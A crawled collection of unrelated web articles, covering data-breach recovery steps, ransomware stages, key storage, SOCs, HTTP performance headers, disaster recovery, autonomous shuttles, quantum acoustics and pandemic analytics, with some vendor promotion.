Do you have more questions about Phishing? Contact us today! | <urn:uuid:1e6063ee-ce31-4b58-a78b-2749930043f2> | CC-MAIN-2022-40 | https://www.barracuda.com/glossary/phishing?utm_source=blog&utm_medium=35716&switch_lang_code=en | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00295.warc.gz | en | 0.917377 | 1,421 | 3.71875 | 4 |
Data breaches have become a part of life. These attacks occur every week, targeting individuals, small businesses, large corporations, governments, and the military. A data breach is a type of cyberattack where information is stolen and/or exposed. This data can include sensitive or proprietary information such as a company’s trade secrets or customer data such as credit cards.
A recent breach targeted Verizon-owned digital carrier Visible, resulting in the theft and changes of customer account information. The hackers also purchased new smartphones using the credentials they stole. Tap or click here to check out our report.
The fact that breaches are more common and threatening doesn’t mean we should be complacent. There are steps you can take to reduce your risks. And if you are a victim of a breach, you can mitigate the damage with some quick action. Here’s how.
1. Know what information was exposed
Have you received an email regarding a breach from a company you do business with? The type of data that was stolen is crucial. While it’s not ideal to have your name, email address and other personal information compromised, it could be worse. Sensitive information such as credit card and Social Security numbers could truly lead to serious trouble.
Even if you weren’t notified that a company you do business with was breached, you should check to be sure. A company might not become aware of the breach for some time and even when it does, it could take a while to figure out the details.
Resources like Have I Been Pwned can help you see if there are any hits. The site keeps a record of data breaches and has more than 11 billion stolen records in its database.
Just go to haveibeenpwned.com and enter your email address in the search bar. Hit the pwned? button, and the website will get to work alerting you of any data breaches you may be part of. Tap or click here for more information on this helpful site.
2. Change your password(s)
First things first — change your login credentials for the breached company immediately. Hopefully, you’re not using the same password for other accounts, as this is terrible practice with or without a breach. If you were doing this, change those other passwords, but don’t make the same mistake.
Many browsers keep track of your hacked passwords. For example, Chrome’s Password Manager has a Password Checkup feature. It reviews your passwords for strength and tells you if any have been compromised. Go to passwords.google.com and click Go to Password Checkup, then Check Passwords.
Firefox, Edge and Safari have similar tools. Tap or click here for instructions on how they work and how to access them.
A strong password is not enough. Two-factor authentication adds another layer of security to your accounts. This consists of something you only know (such as an answer to a question), something you have (your smartphone) or something that identifies you as a person (fingerprint, voice pattern or facial scan).
Without these identifiers, others won’t be able to get into your accounts. Make sure to have 2FA enabled when available, especially on the breached account.
Authenticator apps automate the 2FA process and make it even more secure. They generate one-time passcodes that expire after a short time. The app is unique to your phone, and you don’t need to hand out your phone number. Tap or click here for more on authenticator apps.
3. Check your financial accounts
If your financial data is likely exposed or stolen, log into your bank, debit and credit accounts. Look for any unusual activity such as small unexpected payments, which crooks use to confirm that your account is functional. Once they’ve verified this, they’ll go for larger transactions or even empty your bank account.
Check your email, texts and other notifications for messages from the bank. But be careful, as scammers can be contacting you with spoofed messages. If you get a notification, ignore it and call the bank directly. You can find the phone number on the back of your payment cards.
Another good idea is to set up fraud alerts on your accounts. This won’t hurt your credit, but it will alert creditors that you may have been a victim of fraud, including identity theft. They will then take extra steps like contacting you directly to confirm your identity before extending credit in your name.
Luxury department store chain Neiman Marcus was recently breached, and millions of customers had their personal and financial information leaked. Tap or click here if you’re a Neiman Marcus customer.
4. Check your credit report
Building on the previous tip, check up on your credit report for any unusual activity, such as new accounts opened in your name. Look for unfamiliar addresses, contact names and other such information.
You can set up fraud alerts on your credit card report to make it more difficult for someone to take unauthorized action, such as opening an account using your information.
You can check on your credit report through your financial institution or use a free site like AnnualCreditReport.com to see if anything unusual appears.
5. Oh, it’s serious
If you have reason to believe your data has not only been stolen but is actively being used by someone else, contact your financial institutions to flag your account. And it may be a pain, but cancel your current payment cards and request new ones.
Once you get your new cards, you’ll have to update the payment information on your accounts (such as Amazon), but it’s worth it to stop things before they get worse.
If someone has accessed your account, you may want to freeze your credit. This will restrict access to your credit, making it more difficult for thieves to mess with it. You won’t be able to open a new credit account while the freeze is in place.
Potential lenders will not be able to access your credit report when it’s frozen, so you may need to lift the freeze if you want to apply for a new credit card or get a car loan, insurance or other things that require it.
To initiate a freeze, contact the three national credit bureaus: Equifax, Experian and TransUnion. The FTC has a page listing the websites and phone numbers for these organizations at identitytheft.gov/#/CreditBureauContacts.
Bonus: Give yourself a protection boost
When your personal details are floating around, you’re at higher risk of online attacks. Don’t take chances. Protect all your devices the right way.
TotalAV’s industry-leading security suite is easy to use and offers the best protection in the business. In fact, they’ve received the renowned VB100 award for detecting more than 99% of malware samples for the last three years in a row. And not only do you get continuous protection from the latest threats, but their AI-driven Web Shield browser extension blocks dangerous websites automatically, and their Junk Cleaner can help you quickly clear out your old files. | <urn:uuid:dbba08ce-da62-443c-9e1e-c144f27e3e16> | CC-MAIN-2022-40 | https://www.komando.com/safety-security-reviews/essential-steps-following-data-breach/813949/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335059.31/warc/CC-MAIN-20220927225413-20220928015413-00295.warc.gz | en | 0.9372 | 1,476 | 2.65625 | 3 |
Quantum Sound Wave Control Could Extend Technology into Sensors & Memory
(Phys.org.news) Scientists with the Institute for Molecular Engineering at the University of Chicago and Argonne National Laboratory have built a mechanical system—a tiny “echo chamber” for sound waves—that can be controlled at the quantum level, by connecting it to quantum circuits. The breakthrough could extend the reach of quantum technology to new quantum sensors, communication and memory. It’s a major challenge getting delicate quantum systems to play well with mechanical ones—anything with moving parts—which underlie a great deal of existing technology.
“Getting these two technologies to talk to one another is a key first step for all kinds of quantum applications,” said lead study author Andrew Cleland, the John A. MacLean Sr. Professor for Molecular Engineering Innovation and Enterprise and a senior scientist at Argonne National Laboratory. “With this approach, we’ve achieved quantum control over a mechanical system at a level well beyond what’s been done before.” | <urn:uuid:8d5970d0-ae85-4218-ac64-8eaa0052f0a5> | CC-MAIN-2022-40 | https://www.insidequantumtechnology.com/news-archive/quantum-sound-wave-control-extend-technology-sensors-memory/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337404.30/warc/CC-MAIN-20221003070342-20221003100342-00295.warc.gz | en | 0.896637 | 214 | 2.828125 | 3 |
Encryption keys and passwords are truly "keys to the kingdom." Acquiring them allows attacker to open all kinds of doors, and yet developers are often careless about how they handle them. We often see password and keys hardcoded in the application source, stored with minimal obfuscation in configuration files, and in plaintext in databases. As a result they fall victim to reverse engineering, and software vulnerabilities such as Path Traversal, XXE, Local File Inclusion, and others.
To help mitigate that we review right and wrong ways of storing credentials in an application, and discuss best practices for storing them, such as using keystores.
Once your secrets are properly secured, however, there is a big remaining issue - how do you secure the "key that secures other keys", the Key Encrypting Key (KEK)? Would it not be vulnerable to the same issues we just tried to solve with keys and passwords? In our presentation we discuss preferred ways for securely storing KEKs, from hardware to software, and their relative costs. We conclude by proposing several low cost ways for storing KEKs that any application can afford to implement and offer an open source library that helps achieve that. | <urn:uuid:2b410e80-3457-420b-846c-68546bec4c61> | CC-MAIN-2022-40 | https://2019.bsidesottawa.ca/schedule/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337680.35/warc/CC-MAIN-20221005234659-20221006024659-00295.warc.gz | en | 0.932267 | 249 | 2.5625 | 3 |
To best understand how to protect against ransomware attacks, we must first look at how ransomware might spread across a business’ local systems and SaaS accounts.
Delivery: Ransomware is typically distributed via a phishing email that dupes a user into clicking a link or downloading an attachment, which installs the malware on their system. In the early days of the ransomware boom, these attacks were generic and carried out on a wide scale. However, today’s social engineering attacks are more targeted and customized for the intended victim.
Infection: An employee receives a phishing email and unknowingly clicks on a file that installs a “cryptoworm” variant of ransomware on their laptop, which begins searching for files on the device to encrypt. At the same time, the ransomware spreads across the network, infecting additional PCs and servers. Encryption does not begin immediately, instead the malware first spreads to as many systems as possible. This occurs in the background, so the business remains unaware of the infection.
Encryption: The command and control server operated by the cybercriminals generates a cryptographic key that will be used to encrypt the infected systems. Depending on the type of attack, this server may also be used to collect business information from infected systems. When the attackers are satisfied that the ransomware has been thoroughly distributed, the encryption process is triggered. | <urn:uuid:ffc83c16-a30a-44a3-b3a7-f20781317e09> | CC-MAIN-2022-40 | https://www.mspinsights.com/doc/a-comprehensive-ransomware-protection-detection-response-and-recovery-0001 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334915.59/warc/CC-MAIN-20220926175816-20220926205816-00495.warc.gz | en | 0.946402 | 277 | 2.703125 | 3 |
Researchers at Rice University have come up with new technology that could allow mobile phone carriers to double the throughput of their networks without adding more cell towers.
The researchers have developed the ‘full duplex’ technology that allowswireless devices like smartphones and tablet devices to ‘talk’ and ‘listen’ to cell phone towers using the same frequency. Before this, two frequencies were required.
"Our solution requires minimal new hardware, both for mobile devices and for networks, which is why we've attracted the attention of just about every wireless company in the world," said Ashutosh Sabharwal, professor of electrical and computer engineering at Rice.
"The bigger change will be developing new wireless standards for full-duplex. I expect people may start seeing this when carriers upgrade to 4.5G or 5G networks in just a few years," he continued.
Sabharwal and his team published the paper on full duplex technology in 2010, after which they went on to prove the technology could be used in a real mobile phone network.
"We send two signals such that they cancel each other at the receiving antenna -- the device ears. The cancelling effect is purely local, so the other node can still hear what we're sending," Sabharwal explained. | <urn:uuid:f19b2454-e7c6-4a77-b35f-f8450ce9ea69> | CC-MAIN-2022-40 | https://www.itproportal.com/2011/09/07/rice-university-developes-technology-double-mobile-phone-throughput-without-adding-new-cell-towers/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335350.36/warc/CC-MAIN-20220929100506-20220929130506-00495.warc.gz | en | 0.96645 | 264 | 2.96875 | 3 |
Understanding HTTP and how these headers control behavior of web-based applications can lead to better end-user performance, as well as making it easier to choose an application acceleration solution that addresses the shortcomings of HTTP and browser-based solutions.
HTTP (Hypertext Transfer Protocol) is one of the most ubiquitous protocols on the Internet. It is also one of the few protocols that bridges the gap between networking and application development groups, containing information that is used by both in the delivery and development of web-based applications.
The inner workings of HTTP, particularly the headers used by the client and the server to exchange information regarding state and capabilities, often have an impact on the performance of web-based applications. Understanding HTTP and how these headers control behavior of web-based applications can lead to better end-user performance, as well as making it easier to choose an application acceleration solution that addresses the shortcomings of HTTP and browser-based solutions.
When you open up a browser and request a web page (either by setting a default page or by entering a Uniform Resource Locater or URL), the first thing that happens is that the browser relies upon the operating system to resolve the host name in the URL to an IP address. Normally this is done via a DNS (Domain Name System) query over UDP (User Datagram Protocol) on port 53. However, if the host is listed in the local hosts file, the operating system will not make a DNS query.
When the IP address is obtained, the browser will attempt to open a TCP (Transmission Control Protocol) connection to the web server, usually on port 80. Once the TCP connection is made, the browser will issue an HTTP request to the server using the connection. The request comprises a header section, and possibly a body section (this is where things like POST data go). Once the request is sent, the browser will wait for the response. When the web server has assembled the response, it is sent back to the browser for rendering.
TCP controls many performance-related aspects of web applications and is often not manageable by developers or network administrators. Affecting performance by modifying TCP parameters may require the assistance of application delivery controllers or web acceleration solutions, or changing settings in the operating system itself.
The base request comprises a method, the URI (Uniform Resource Indicator) of the web page or resource being requested, and the HTTP version desired (1.0 or 1.1). The method may be one of:
GET and POST are almost universally supported by web servers, with the difference between them being the way in which query parameters are represented. With the GET method, all query parameters are part of the URI. This restricts the length of the parameters because a URI is generally limited to a set number of characters. Conversely, all parameters are included within the body of the request when using the POST method and there is usually no limit on the length of the body. PUT and DELETE, though considered important for emerging technology architectures such as REST (Representational State Transfer), are considered potentially dangerous as they enable the user to modify resources on the web server. These methods are generally disabled on web servers and not supported by modern web browsers.
Modern browsers render content as it is retrieved, known as progressive rendering, except in the case of Internet Explorer (IE) and table objects. IE will wait for the entire table object to be retrieved before rendering it to the page, which can cause IE to appear to be "slow" when opening a web page. This can often be remedied by adding table-layout:fixed to the style applied to the table in question.
The HTTP response consists of a header section and a body. The header section tells the browser how to treat the body content and the browser renders the content for viewing. Each HTTP response includes a status code, which indicates the status of the request. The most common status codes are:
Most HTTP responses will also contain references to other objects within the body that will cause the browser to automatically request these objects as well. Web pages often contain more than 30 other object references required to complete the page.
When retrieving these referenced objects, the default browser behavior is to open two TCP connections per host seen in the references. With Internet Explorer there is a Windows registry setting that limits this to a total of eight TCP connections. There is a similar setting in Firefox, but its maximum is 24 TCP connections.
HTTP headers carry information about behavior and application state between the browser and the server. These headers can be modified and examined by the browser and the server, as well as intermediary devices such as web acceleration solutions and application delivery controllers. The headers sent by the browser notify the web server of the browser's capabilities. The headers sent by the web server tell the browser how to treat the content.
The most important browser headers, in terms of end-user performance, are:
The various If-* headers, such as If-Modified-Since, will enable the web server to send a response that indicates the content has not been modified if this is true. This can potentially turn a 200KB download into a 1KB download, as the browser will respond to the 304 Not Modified response by loading the referenced content from the browser's cache. However, a lot of If-* requests for static content can result in unnecessary round trips. This can really slow end-user performance. The no-cache header and its relatives—no-store, private, must-revalidate, and proxy-revalidate—request that proxies and, sometimes, web servers not cache the response to the request. Honoring those requests can cause the servers to do a lot more work because they must always return the full content rather than enable the browser to use a cached version.
The most important web server headers, in terms of end-user performance, are:
F5's BIG-IP WebAccelerator employs a set of technologies collectively called Intelligent Browser Referencing (IBR) that make the use of the browser's cache and TCP connections more efficient, often dramatically improving end-user performance.
Again, the first three items are inter-related and are meant to impart the same information as when sent by the browser. The cache-control headers are very important because they can be used to store items in the browser cache and avoid future HTTP requests altogether. However, using cached data runs the risk of using out-dated data if the content changes before the cached object expires. Content-type is important for telling the browser how to handle the object. This is most important for content that the browser hands off to plug-ins (Flash, Microsoft Office documents, etc.). It is also the biggest clue to the true function of that object in the web application. Improper content types will often result in slower, but not broken web applications. The Date header is very important because it affects how the browser interprets the cache-control headers. It is important to make sure the date on the server is set correctly so that this field is accurate. The Accept-Ranges header is only important when downloading PDF documents. It enables the browser to know that it can request the PDF document one page at a time.
F5 BIG-IP Local Traffic Manager can act as a cookie gateway and perform cookie encryption/decryption. It can also improve the performance of encryption/decryption for cookies as well as secure traffic (HTTPS) due to acceleration technology.
The HTML standard allows the inclusion of meta tags within the HEAD element of an HTML page. There are two types of meta tags: HTTP-EQUIV and NAME. HTTP-EQUIV meta tags are equivalent to HTTP headers. These meta tags can conflict with–and even contradict—the HTTP headers sent by the browser or web server. This is problematic because meta tags will take precedence. In many cases, HTML coders will use meta tags to provide web page functionality without realizing what the meta tags do to the inner workings of the browser such as cache behavior. The two meta tags that cause the most problems with web application performance are the no-cache and refresh tags. The no-cache tag instructs the browser to not cache the object that contains the meta tag. This forces the browser to always get a full download of that object, even if it has not changed. The refresh tag is often used to mimic an HTTP 302 redirect response. The problem is that the refresh tag tells the browser to override the browser's cache settings and revalidate every object referenced by the refresh tag.
There are many more headers and settings involved in HTTP, but these are the ones that can affect the performance of HTTP the most. Being aware of how HTTP and its headers interact between the browser and the server can not only help developers and network professionals improve the end-user experience, it can also provide invaluable information when troubleshooting particularly slow sites and applications.
Web application acceleration solutions can also act to improve the end-user experience by using the many HTTP headers and browser options available to ensure optimal performance. These solutions are often preferred over making changes to the application itself because they are less invasive and include additional protocol layer (TCP) enhancements and optimizations that improve the overall delivery of applications. | <urn:uuid:59ec2c59-6306-449f-b352-6cd438d2917e> | CC-MAIN-2022-40 | https://www.f5.com/ja_jp/services/resources/white-papers/fundamentals-of-http | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335504.22/warc/CC-MAIN-20220930181143-20220930211143-00495.warc.gz | en | 0.904649 | 2,200 | 3.90625 | 4 |
Autonomous shuttles give cities a low-risk way to test connected infrastructure, expand transit options and reduce traffic congestion.
Cities are building out their transit ecosystems to support autonomous vehicle (AV) shuttles, which offer a low-risk way to experiment with connected infrastructure and self-driving vehicles while bridging transportation inequities and improving road safety.
In Peachtree Corners, Ga., home to the Curiosity Lab, one of the country’s first 5G-enabled smart cities, officials introduced four self-driving shuttles in October 2021. Manufactured by Navya and managed by autonomous mobility company Beep, the driverless shuttles transport passengers between city hall and seven other stops along a three-mile AV test track, City Manager Brian Johnson said.
This month, the city announced plans to introduce 5G two-way cellular-vehicle-to-everything technology that will enable communication between connected traffic signals, smart street lights and vehicles equipped with on-board units, including the four AV shuttles. Residents with smartphones and tablets can also connect to the traffic infrastructure through the Travel Safely app from Applied Information.
Many cities have experimented with AV shuttles. Las Vegas introduced the first fully electric autonomous shuttle on public streets in 2017. The shuttles, which used cameras, GPS, and Lidar sensors to aid in navigation, followed a regular route through city traffic during the annual Consumer Electronics Show.
In February 2020, Columbus, Ohio, winner of the U.S. Department of Transportation’s 2016 Smart City Challenge, launched what it called “the nation's first daily-operating public self-driving shuttle” in a residential area. The city deployed two EasyMile driverless shuttles in Columbus’ Linden neighborhood, a food-insecure area to give residents access to a grocery store, jobs, services and community centers.
More recently, New Jersey Gov. Phil Murphy announced plans to deploy 100 self-driving electric shuttles to serve the state capital’s 90,000 residents. The Trenton Mobility & Opportunity: Vehicles Equity System Project will cater to the 70% of households that do not have access to a car and have limited public transportation options.
In March, Florida’s Jacksonville Transportation Authority commenced the first phase of its Ultimate Urban Circulator project. First announced in 2017, the project will eventually connect the city’s downtown area to neighboring communities with a variety of mobility options. The city chose Beep to run shuttles on a three-mile stretch of the downtown Bay Street Innovation Corridor. During the height of the pandemic, JTA and Beep experimented with a fleet of AVs to support COVID-19 testing efforts, delivering over 30,000 samples from a drive-thru testing facility to Mayo Clinic’s labs for evaluation.
Self-driving shuttles have also seen success on urban college campuses. May Mobility provided over 28,000 trips to residents, university students and visitors around downtown and the University of Texas at Arlington campus. The University of Michigan partnered with the city of Ann Arbor in a similar initiative.
“Vehicles are now overtaking smartphones as the most connected platform on the planet, just with the amount of data that is available,” Johnson said. “The next step is being able to harness it effectively.”
NEXT STORY: Can chatrooms replace courtrooms? | <urn:uuid:7837d7b0-d97d-4283-b18a-a9bcac2da299> | CC-MAIN-2022-40 | https://www.gcn.com/emerging-tech/2022/03/av-shuttles-drive-wider-transit-options/363891/?oref=gcn-related-article | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337244.17/warc/CC-MAIN-20221002021540-20221002051540-00495.warc.gz | en | 0.930354 | 707 | 2.890625 | 3 |
- 13 September, 2021
4 Benefits of Integrating a Language With a Database
By Dr. Jans Aasman:
One of the hallmarks of a truly modern programming language is the coupling of a language—for creating applications, devising algorithms and solving business problems—with an underlying database. When there is practically no separation between a database and its programming language, developers immensely increase their productivity, maximize the effectiveness of the code they write and provide unparalleled speed and flexibility in supporting business needs.
Predicating a programming language on a database delivers these advantages by enabling developers to treat data as if it is in-memory, liberating them from the burden of manipulating how data is represented in the underlying database. This one simple advantage exponentially increases the flexibility for addressing business problems and, when used with advanced logic languages, enables developers to write applications in a fraction of the time and with less effort than it would otherwise require.
Specific benefits of tightly coupling a database with its programming language include eliminating the time-honored mismatch between data structures and database representations, smart caching with transactional technologies for committing or rolling back database changes and automatically changing object definitions.
These benefits remove the database as an otherwise complicating factor in supporting business use of data by freeing developers to flexibly innovate solutions—and speedily implement them.
Developers focus on manipulating data structures to solve business problems. Traditionally, this concern was hamstrung by the onus of translating those structures into how data are represented in the database, a time-consuming necessity detracting from programmers’ attention to business problems. By fully integrating an object-oriented database or graph database with its programming environment, users can manipulate data objects in memory and they’ll automatically persist to storage. Developers can solely focus on working with data structures for business objectives without spending just as much, if not more, effort wrangling data’s representation in the database.
Read the full article at DevOps. | <urn:uuid:d15a9779-791e-416f-a439-205e9b81cc85> | CC-MAIN-2022-40 | https://allegrograph.com/4-benefits-of-integrating-a-language-with-a-database/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337524.47/warc/CC-MAIN-20221004184523-20221004214523-00495.warc.gz | en | 0.89768 | 401 | 2.78125 | 3 |
Data Security Knowledge Base
What is a Security Operations Center (SOC)?
A security operations center (SOC) is a facility that houses an information security team responsible for monitoring and analyzing an organization’s security posture on an ongoing basis. The SOC team’s goal is to detect, analyze, and respond to cybersecurity incidents using a combination of technology solutions and a strong set of processes. Security operations centers are typically staffed with security analysts and engineers as well as managers who oversee security operations. SOC staff work close with organizational incident response teams to ensure security issues are addressed quickly upon discovery.
Security operations centers monitor and analyze activity on networks, servers, endpoints, databases, applications, websites, and other systems, looking for anomalous activity that could be indicative of a security incident or compromise. The SOC is responsible for ensuring that potential security incidents are correctly identified, analyzed, defended, investigated, and reported.
How a Security Operations Center Works
Rather than being focused on developing security strategy, designing security architecture, or implementing protective measures, the SOC team is responsible for the ongoing, operational component of enterprise information security. Security operations center staff is comprised primarily of security analysts who work together to detect, analyze, respond to, report on, and prevent cybersecurity incidents. Additional capabilities of some SOCs can include advanced forensic analysis, cryptanalysis, and malware reverse engineering to analyze incidents.
The first step in establishing an organization’s SOC is to clearly define a strategy that incorporates business-specific goals from various departments as well as input and support from executives. Once the strategy has been developed, the infrastructure required to support that strategy must be implemented. According to Bit4Id Chief Information Security Officer Pierluigi Paganini, typical SOC infrastructure includes firewalls, IPS/IDS, breach detection solutions, probes, and a security information and event management (SIEM) system. Technology should be in place to collect data via data flows, telemetry, packet capture, syslog, and other methods so that data activity can be correlated and analyzed by SOC staff. The security operations center also monitors networks and endpoints for vulnerabilities in order to protect sensitive data and comply with industry or government regulations.
Benefits of Having a Security Operations Center
The key benefit of having a security operations center is the improvement of security incident detection through continuous monitoring and analysis of data activity. By analyzing this activity across an organization’s networks, endpoints, servers, and databases around the clock, SOC teams are critical to ensure timely detection and response of security incidents. The 24/7 monitoring provided by a SOC gives organizations an advantage to defend against incidents and intrusions, regardless of source, time of day, or attack type. The gap between attackers’ time to compromise and enterprises’ time to detection is well documented in Verizon’s annual Data Breach Investigations Report, and having a security operations center helps organizations close that gap and stay on top of the threats facing their environments.
Best Practices for Running a Security Operations Center
Many security leaders are shifting their focus more on the human element than the technology element to “assess and mitigate threats directly rather than rely on a script.” SOC operatives continuously manage known and existing threats while working to identify emerging risks. They also meet the company and customer’s needs and work within their risk tolerance level. While technology systems such as firewalls or IPS may prevent basic attacks, human analysis is required to put major incidents to rest.
For best results, the SOC must keep up with the latest threat intelligence and leverage this information to improve internal detection and defense mechanisms. As the InfoSec Institute points out, the SOC consumes data from within the organization and correlates it with information from a number of external sources that deliver insight into threats and vulnerabilities. This external cyber intelligence includes news feeds, signature updates, incident reports, threat briefs, and vulnerability alerts that aid the SOC in keeping up with evolving cyber threats. SOC staff must constantly feed threat intelligence into SOC monitoring tools to keep up to date with threats, and the SOC must have processes in place to discriminate between real threats and non-threats.
Truly successful SOCs utilize security automation to become effective and efficient. By combining highly-skilled security analysts with security automation, organizations increase their analytics power to enhance security measures and better defend against data breaches and cyber attacks. Many organizations that don’t have the in-house resources to accomplish this turn to managed security service providers that offer SOC services. | <urn:uuid:ded730ef-c5c8-494f-86fb-e5e30142bcdf> | CC-MAIN-2022-40 | https://digitalguardian.com/dskb/security-operations-center | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337723.23/warc/CC-MAIN-20221006025949-20221006055949-00495.warc.gz | en | 0.939017 | 907 | 2.9375 | 3 |
There are five essential facts about disaster recovery and business continuity every business must keep in mind when creating or altering their practices.
Over the last decade, disaster recovery and business continuity awareness has grown among businesses of all sizes. There are two key factors driving this increasing awareness. The first is the continual growth in the reliance on storing data digitally. The second is the barrage of new disaster recovery techniques that have recently been introduced.
There are five essential facts about disaster recovery and business continuity every business must keep in mind when creating or altering their practices.Business Continuity must be a top concern as there have been a number of eye-opening statistics, which illustrate how important disaster recovery planning really is.
75% of businesses without continuity plans fail within three years of suffering a disaster. 43% of businesses who suffer a disaster never re-open at all. Along with prepping for a disaster, the growing number of government regulations has boosted the requirements tied to data replication and data protection.
It is impossible for companies to develop an effective strategy if disaster recovery and business continuity are treated as the same thing. Business continuity is the ability to maintain essential operations and provide services after any type of disruptive event, large or small. Recovery is a broader concept and includes everything from IT infrastructure to personnel. It is also reliant on a variety of manual methods used to reestablish the operational abilities of the IT environment.
There are two primary metrics which disaster recovery plans center around: They determine they type of recovery plans that provide the greatest long-term benefits and minimize service disruption. RPO (Recovery Point Objective) is the age of data that must be restored and defines how much recently created or modified information can be lost. RTO (Recovery Time Objective) is the amount of time in which the applications, systems, and functions must be back online.
Based upon the RPO and RTO, businesses should use the System Protection Continuum to determine the solution that will meet their disaster recovery needs. It is a way to visualize the protection offered by different data protection strategies. On one end are strategies such as on-site tape and cold sites; they offer slower recovery times and some data may never be recovered. On the other end are strategies that ensure zero data loss and near instantaneous recovery times. This includes strategies such as synchronous replicated data centers.
There are two fundamental types of replication, synchronous and asynchronous. Synchronous replication is used to achieve zero loss and zero downtime. The common problems businesses must overcome include bandwidth availability, network latency, and distance limitations. Asynchronous replication is almost entirely offline. While it overcomes bandwidth, network, and distance issues it also negatively affects RPO and RTO.
About the author: Jacob Baker explains the essential facts about disaster recovery services that are critical for keeping businesses running after system failures. | <urn:uuid:d071299f-63ad-4e62-930b-464e002b8091> | CC-MAIN-2022-40 | https://www.colocationamerica.com/blog/five-facts-about-disaster-recovery | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00695.warc.gz | en | 0.949648 | 571 | 2.609375 | 3 |
As society grapples with the public health and economic challenges manifesting in COVID-19’s wake, businesses rushing to realign themselves to this new reality are looking to technology to help. Data analytics in particular is proving to be an ally for epidemiologists, as they join forces with data scientists to address the scale of the crisis.
The spread of COVID-19 and the public’s desire for information has sparked the creation of open-source data sets and visualizations, paving the way for a discipline we’ll introduce as pandemic analytics. Analytics is the aggregation and examination of data from many sources to derive insights, and when used to study and fight global outbreaks, pandemic analytics is a modern way to combat a problem as old as humanity itself: the proliferation of disease.
Here are three ways pandemic analytics are helping us get through the COVID-19 crisis:
1 – To Craft the Right Response
In the early 1850s, as London battled a rampant rise in the number of cholera cases, John Snow – the founder of modern epidemiology – noticed cluster patterns of cholera cases around water pumps. This discovery allowed scientists to leverage data to combat pandemics for the first time, driving their efforts towards quantifying the risk, identifying the enemy, and devising an appropriate response strategy.
That early flash of genius has since advanced, and 170 years of cumulative intelligence has proven that early interventions disrupt the spread of disease. However analysis, decisioning and its subsequent intervention can only be effective when it first takes into consideration all accessible/meaningful data points.
At Sheba Medical Center in Israel, healthcare administrators are using data-driven forecasting to optimize allocation of personnel and resources in advance of potential local outbreaks. These solutions are powered by machine learning algorithms that offer predictive insights based on all accessible data about the spread of the disease, such as confirmed cases, deaths, test results, contact tracing, population density, demographics, migration flow, availability of medical resources, and pharma stockpiles.
Viral spread has a small silver lining: the exponential creation of new data which we can learn from and act upon. With the right analytics capabilities, healthcare professionals can answer questions such as where the next cluster is most likely to arise, which demographic is most susceptible, and how the virus may mutate over time.
2 – To See the Unseeable
The accessibility of data from trusted sources has led to unprecedented sharing of visualizations and messages to educate the public. Take for example the dynamic world map created by Johns Hopkins’ Center for Systems Science and Engineering, and these brilliantly simple yet enlightening animations from the Washington Post. Such visualizations are quickly teaching the public about how viruses spread, and which individual actions can help or hinder that spread. The democratization of data and analytics tools, combined with mass ability to share information via the internet, has allowed us to witness the impressive power of data used for good.
In recent months, companies have brought pandemic data gathering in-house to develop their own proprietary intelligence. Some of the more enterprising companies have even set up internal Track & Respond Command Centers to guide their employees, customers and broader partner ecosystem through the current crisis.
HCL realized early in the outbreak that it would need its own command center dedicated to COVID-19 response. Coordinated by senior leadership, it gives HCL data scientists the autonomy to develop creative and pragmatic insights for more informed decisioning. For example, developing predictive analytics on potential impact to HCL’s customers, as well as the markets where HCL services them.
With the goal of enabling leadership to respond quickly throughout the development of the COVID situation, we employed techniques such as statistics, control theory, simulation modeling and Natural Language Processing (NLP). For simplicity, we’ll categorize our approach under the Track & Respond umbrella:
- TRACK the situation quantitatively and qualitatively to understand its magnitude.
- Perform topic modeling in real-time across thousands of publications from international health agencies and credible news outlets; automate the extraction of quantifiable trends (alerts) and actionable information relevant to a manager’s role & responsibility.
- Create forecasting which will directionally track and predict when regions critical to HCL and its customers will reach peak infection, and conversely, a rise in recovery rate.
- RESPOND using a mathematical model of the situation as a proxy for the actual pandemic.
- Create a multi-dimensional simulation model using robust and contextual variables to produce a meaningful prediction customized to the leader using it.
3 – To Diagnose, Treat, and Cure
On December 21, 2019, an AI system operated by a Toronto-based startup called BlueDot detected the earliest anomalies relating to what was then considered a mysterious pneumonia strain in Wuhan. The AI system accessed over one million articles in 65 languages to detect a similarity to the 2003 SARS outbreak. It was only nine days later that the WHO alerted the wider public about the emergence of this new danger.
Developing healthcare solutions is a challenge of solving data at scale, and this is where AI can play a crucial role. AI technology has already been deployed to help diagnose the Coronavirus through imaging analysis, decreasing the diagnosis time from CT scan results from about 5 minutes to 20 seconds. Through automation, AI can not only help cope with the rising diagnostics workloads but also free up valuable resources to focus on treating patients.
AI and ML can also be used to speed up the pharmaceutical development process. So far, only one AI-developed drug has reached human clinical trials. But even that solitary success is extremely impressive as the technology was able to expedite a process that typically takes years.
It’s quite possible that AI in conjunction with medical researchers can help reduce drug development timelines to mere months or weeks. With the world still in urgent need of a COVID-19 vaccine months after the first reported death, this human-machine synergy in the pharmaceutical space is the need of the hour.
Where We Go from Here
As the world braces itself for the impact of the COVID-19 outbreak, it is important to remember that technology is nothing but the cumulative innovation of humanity over time, and in technology we have the tools necessary to help us survive and protect ourselves. We do not know what lies in store for us in the coming weeks and months, but we will face it together, and our greatest strength will be in how we share, analyze, and derive insights from our shared knowledge.
With the right technology applied in the right direction, we have the potential to contain and minimize impact of disease today and in the future.
This blog was also published in ETHealthworld.com. | <urn:uuid:0aa0d533-865d-4bae-8943-c52283a590b6> | CC-MAIN-2022-40 | https://www.hcltech.com/blogs/pandemic-analytics-how-data-and-analytics-can-help-us-combat-covid-19 | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030334579.46/warc/CC-MAIN-20220925132046-20220925162046-00695.warc.gz | en | 0.93293 | 1,377 | 3.046875 | 3 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.